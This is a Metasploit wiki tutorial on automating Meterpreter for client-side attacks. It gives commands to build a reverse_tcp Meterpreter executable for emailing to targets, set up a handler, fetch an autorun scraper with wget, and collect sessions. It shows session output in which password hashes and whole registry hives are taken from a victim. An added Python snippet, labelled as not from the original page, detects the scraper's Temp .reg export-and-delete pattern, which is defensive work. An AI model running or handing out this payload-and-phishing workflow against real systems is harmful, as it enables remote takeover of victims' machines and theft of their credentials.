Metasploit Framework Wiki
Metasploit 3: Automating Meterpreter for Client-Side Exploits
Step 1. Determine your payload delivery. In this case, we will be manually sending an email message to each target, with an executable
attached. The actual "exploit" is social engineering, but this can be replaced by any other type of remote code execution vector. To
generate an executable for the test, we use msfpayload piped to msfencode.
$ msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | \
    msfencode -b '' -t exe -o meterpreter.exe
$ file meterpreter.exe
meterpreter.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
$ ls -alrt meterpreter.exe
-rw-r--r-- 1 hdm hdm 9728 Nov 17 13:24 meterpreter.exe
Step 2. Configure a shellcode handler inside Metasploit 3. Since we are targeting a wide
variety of users, we want them to connect back to us. In order to gather as much
information as possible, we will be using the Meterpreter payload.
msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST A.B.C.D
msf exploit(handler) > set LPORT 8080
Step 3. In order to make efficient use of each session, we are going to provide
Meterpreter with an "autorun" script. This script will scrape system information
from each session automatically when the session is created. One example of this
kind of script can be found at:
http://metasploit.com/users/hdm/tools/scraper.rb
msf exploit(handler) > sh -c 'cd /tmp; wget http://metasploit.com/users/hdm/tools/scraper.rb'
msf exploit(handler) > set AutoRunScript /tmp/scraper.rb
msf exploit(handler) > exploit -j
Step 4. Send out our email or otherwise force the Meterpreter payload to execute
on each target. At this point, results should start streaming in. Once the autorun script
completes, the session will be available from the msfconsole. The captured data will be
stored in the ~/.msf3/logs/scraper/ directory.
[*] Transmitting intermediate stager for oversized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] New session on 10.10.11.164:12188...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\DOCUME~1\HD\LOCALS~1\Temp\NIgfrwlC.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\DOCUME~1\HD\LOCALS~1\Temp\dClzheFr.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\DOCUME~1\HD\LOCALS~1\Temp\mhJZFMly.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\DOCUME~1\HD\LOCALS~1\Temp\CphWxqAm.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\DOCUME~1\HD\LOCALS~1\Temp\aHrkdFru.reg)
[*] Cleaning HKU
[*] Completed processing on 10.10.11.164:12188...
[*] Meterpreter session 1 opened (10.10.10.26:8080 -> 10.10.11.164:12188)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: HDMWIN\HD
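The transcript above shows the scraper's footprint on the target: each hive is exported to a .reg file with a random eight-letter name in the user's Temp directory, downloaded, and then removed ("Cleaning"). The following is an added example, not code from the original page or from the Metasploit project, showing how a defender could flag that cadence in host file-event logs; the "timestamp host event path" log layout and the constructed sample events are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample host file-event records (not from the original page); the
# "timestamp host event path" layout is an assumed, simplified log format.
SAMPLE_EVENTS = """\
2010-11-17T13:31:02Z HDMWIN FileCreate C:\\DOCUME~1\\HD\\LOCALS~1\\Temp\\NIgfrwlC.reg
2010-11-17T13:31:05Z HDMWIN FileDelete C:\\DOCUME~1\\HD\\LOCALS~1\\Temp\\NIgfrwlC.reg
2010-11-17T13:31:07Z HDMWIN FileCreate C:\\DOCUME~1\\HD\\LOCALS~1\\Temp\\dClzheFr.reg
2010-11-17T13:31:09Z HDMWIN FileDelete C:\\DOCUME~1\\HD\\LOCALS~1\\Temp\\dClzheFr.reg
2010-11-17T13:31:11Z HDMWIN FileCreate C:\\DOCUME~1\\HD\\LOCALS~1\\Temp\\mhJZFMly.reg
2010-11-17T13:31:13Z HDMWIN FileDelete C:\\DOCUME~1\\HD\\LOCALS~1\\Temp\\mhJZFMly.reg
2010-11-17T13:40:00Z HDMWIN FileCreate C:\\Documents and Settings\\HD\\Desktop\\backup.reg
2010-11-17T14:02:00Z FILESRV FileCreate C:\\WINDOWS\\Temp\\AbCdEfGh.reg
"""

# A .reg file in a Temp directory whose name is eight letters, matching the
# names seen in the scraper transcript (NIgfrwlC.reg, dClzheFr.reg, ...).
TEMP_REG = re.compile(r"\\Temp\\[A-Za-z]{8}\.reg$", re.IGNORECASE)

def parse(line):
    ts, host, event, path = line.split(" ", 3)  # path may contain spaces
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, event, path

def short_lived_temp_reg_exports(log, max_lifetime=timedelta(seconds=30)):
    """Return {host: [paths]} for Temp .reg files created and deleted within max_lifetime."""
    created = {}  # (host, path) -> creation time
    hits = {}
    for line in log.splitlines():
        ts, host, event, path = parse(line)
        if not TEMP_REG.search(path):
            continue
        if event == "FileCreate":
            created[(host, path)] = ts
        elif event == "FileDelete" and (host, path) in created:
            if ts - created.pop((host, path)) <= max_lifetime:
                hits.setdefault(host, []).append(path)
    return hits

def hosts_with_hive_dump_pattern(log, min_files=3):
    """Hosts where at least min_files hives were exported and cleaned: the autorun cadence."""
    hits = short_lived_temp_reg_exports(log)
    return sorted(host for host, paths in hits.items() if len(paths) >= min_files)

if __name__ == "__main__":
    for host in hosts_with_hive_dump_pattern(SAMPLE_EVENTS):
        print(f"{host}: registry hives exported to Temp and removed within seconds")
```

A single Temp .reg file that is never deleted (FILESRV above) or a user's own export on the Desktop does not trip the check; only the export-then-clean sequence repeated across several hives does.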